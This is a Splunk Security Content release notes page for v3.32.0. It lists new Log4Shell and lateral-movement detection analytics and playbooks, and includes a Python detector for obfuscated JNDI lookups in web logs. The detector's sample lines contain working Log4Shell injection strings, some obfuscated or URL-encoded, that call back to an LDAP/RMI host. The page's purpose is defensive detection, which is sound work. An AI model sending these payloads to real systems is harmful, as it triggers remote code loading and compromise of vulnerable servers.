Splunk® Security Content

Release Notes


What's new

Enterprise Security Content Updates v3.32.0 was released on December 15, 2021. It includes the following enhancements.

New analytic story

  • Log4Shell CVE-2021-44228

Updated analytic story

  • Active Directory Lateral Movement

New analytics

  • Curl Download and Bash Execution
  • Wget Download and Bash Execution
  • Linux Java Spawning Shell
  • Windows Java Spawning Shell
  • Java Class File download by Java User Agent
  • Outbound Network Connection from Java Using Default Ports
  • Log4Shell JNDI Payload Injection Attempt
  • Log4Shell JNDI Payload Injection with Outbound Connection
  • Detect Outbound LDAP Traffic
  • Hunting for Log4Shell
  • Possible Lateral Movement PowerShell Spawn
  • Short Lived Scheduled Task
  • Randomly Generated Windows Service Name
  • Randomly Generated Scheduled Task Name
  • Unusual Number of Computer Service Tickets Requested
  • Unusual Number of Remote Endpoint Authentication Events
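
Several of the new analytics above (Log4Shell JNDI Payload Injection Attempt, Hunting for Log4Shell) concern spotting `${jndi:...}` lookup strings in request data before the vulnerable Log4j instance has resolved them. The example below is added here to illustrate that idea in stand-alone Python; it is not the SPL behind any Splunk analytic and does not reproduce their logic. The sample access-log lines, the callback address 203.0.113.10 and the function names are constructed for this example. The point it adds over a plain string match is the normalisation step: attackers wrapped the keyword in `${lower:j}`, `${::-j}` and URL encoding so that a naive `jndi:` search misses the request, while the Log4j lookup engine still evaluates it.

```python
"""Toy Log4Shell (CVE-2021-44228) JNDI lookup detector for web access logs.

Added example for this release-notes page, not Splunk's own detection code.
It normalises the obfuscations seen around ${jndi:...} and then matches the
canonical form. All sample log lines are constructed for this example.
"""
import re
import urllib.parse

# Constructed combined-format access log lines (not real traffic).
SAMPLE_LOGS = [
    '10.0.0.5 - - [15/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [15/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [15/Dec/2021:10:01:07 +0000] "GET /?q=${${lower:j}ndi:${lower:l}${lower:d}ap://203.0.113.10:1389/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [15/Dec/2021:10:01:09 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.10%3A1099%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [15/Dec/2021:10:01:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}dap://203.0.113.10/d}"',
]

# Lookup schemes that reach an attacker-controlled server. Matched on the
# normalised (lower-cased, decoded) string.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*:\s*//\s*([^/\s}:]+)",
    re.IGNORECASE,
)

# Lookups that evaluate to a literal and were used to split up the word "jndi":
#   ${lower:J} / ${upper:j}   -> j
#   ${::-j} / ${env:NOPE:-j}  -> j   (default value of an empty or unknown lookup)
CASE_RE = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^{}]*)\}", re.IGNORECASE)
DEFAULT_RE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo URL encoding and collapse literal-producing lookups until stable.

    The patterns refuse to cross a nested brace, so inner lookups are rewritten
    first: ${${lower:j}ndi:...} becomes ${jndi:...} after two rounds. The round
    cap bounds the work on hostile input.
    """
    for _ in range(max_rounds):
        before = text
        text = urllib.parse.unquote(text)            # %24%7B -> ${
        text = CASE_RE.sub(lambda m: m.group(1), text)
        text = DEFAULT_RE.sub(lambda m: m.group(1), text)
        if text == before:
            break
    return text.lower()


def detect(line: str):
    """Return (scheme, callback_host, normalized_line) for a JNDI lookup, else None."""
    norm = normalize(line)
    m = JNDI_RE.search(norm)
    if not m:
        return None
    return m.group(1).lower(), m.group(2), norm


def scan(lines):
    """Run detect() over access-log lines and collect findings with the source IP."""
    findings = []
    for line in lines:
        hit = detect(line)
        if hit:
            src = line.split(" ", 1)[0]              # first field of a combined-format line
            findings.append({"src": src, "scheme": hit[0], "callback_host": hit[1]})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"{f['src']} -> {f['scheme']}://{f['callback_host']}")
```

The callback host pulled out of each hit is the pivot a responder wants next: it is the destination to look for in the outbound LDAP, RMI or DNS connection data that the "Log4Shell JNDI Payload Injection with Outbound Connection" and "Detect Outbound LDAP Traffic" analytics cover, and a request that matched here but produced no such connection is a weaker signal than one that did.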

Updated analytics

  • Any PowerShell DownloadFile
  • CMD Carry Out String Command Parameter
  • Malicious PowerShell Process - Connect To Internet With Hidden Window

New analytics for Splunk Behavioral Analytics

  • Detect RClone Command-Line Usage
  • Windows Curl Upload to Remote Destination
  • DNS Exfiltration Using Nslookup App
  • Fsutil Zeroing File
  • BCDEdit Failure Recovery Modification
  • WBAdmin Delete System Backups
  • Excessive Number of Office Files Copied
  • High File Deletion Frequency

Updated analytics for Splunk Behavioral Analytics

  • Attempt To Delete Services
  • Attempt To Disable Services
  • Attempted Credential Dump From Registry via Reg exe
  • Delete a net user
  • Deny Permission using Cacls Utility
  • Detect Dump LSASS Memory using comsvcs
  • Disable Net User Account
  • First time seen command line argument
  • Grant Permission Using Cacls Utility
  • Prohibited apps spawning cmdprompt
  • Potential Pass the Token or Hash Observed at the Destination Device
  • Rare Parent-Child Process Relationship
  • ptt pth kerb ntlm origin device
  • Resize Shadowstorage Volume
  • sdelete application execution

New playbooks

  • Log4Shell Investigate and Respond
  • Internal Host Splunk Investigate
  • Internal Host SSH Log4j Investigate
  • Internal Host SSH Investigate
  • Internal Host Winrm Log4j Investigate
  • Internal Host Winrm Investigate
  • Internal Host Winrm Log4j Respond
  • Internal Host SSH Log4j Respond

Other updates

  • Added the Splunk Behavioral Analytics package
  • Updated the Docker CI testing logic
  • Added playbook rendering to the docs

Last modified on 15 December, 2021

This documentation applies to the following versions of Splunk® Security Content: 3.32.0

